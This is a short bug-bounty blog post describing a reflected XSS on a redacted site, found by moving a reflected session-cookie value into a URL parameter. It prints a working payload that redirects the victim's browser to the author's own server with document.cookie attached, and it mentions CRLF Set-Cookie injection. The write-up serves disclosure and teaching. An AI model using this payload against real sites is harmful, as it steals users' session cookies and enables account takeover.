Utkarsh Agrawal
Oct 22, 2018 · 2 min read

Cookie-based-injection XSS making exploitable with-out exploiting other Vulns.

Hi all,

This is a short blog post about making exploitable Cookie based XSS.

I was testing a site [redacted.com] can’t take name for Obvious reasons. I was testing it on the Repeater tab on the burp and testing a parameter which was reflecting back on the HTML page but encoded.

URL:- http://[redacted.com]/path/file.php?f=a*&location=12

* was the injection point I was trying.

<script type="text/javascript">
page.perform('a*', 12);
</script>

I was trying to bypass the filter by injecting different payload again and again (means sending requests again and again) and all of the sudden I got another parameter reflected on the page which was cookie parameter which was not reflected before. How?

Frankly I don’t know?

<script type="text/javascript">
page.perform('a*', 12, '&PHPSESSID=73uj42unj5vu6urg6v4aa8');
</script>

I was literally surprised that How I got this new parameter reflected on the page and why not before. Okay go on, now I started to see if that cookie parameter can be injected or not and to my surprised it was inject-able.

Now I got XSS injection point but the main thing is How Can I exploit it against users ?

For making cookie based XSS injection exploitable you might need to exploit another vulnerability i.e. CRLF (because you can then try %0d%0aSet-Cookie). I tried to find out but didn’t get it.

Next I got an idea what if I place that Cookie parameter into the URL GET parameters like this:-

http://[redacted.com]/path/file.php?f=a&location=12&PHPSESSID={payload}

payload:-

a’);document.location=”http://myserver/"%2bdocument.cookie;test('.

and yeah it works the same. Wow! I got all the cookies on my server. I quickly reported it to the team. :)

It was a good case for me.

AND one thing I got to learn is that if you got cookie based injection then you should also check by replace the parameter from cookie header to URL parameter like when you do POST to GET to make easy exploitable.

Thanks

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store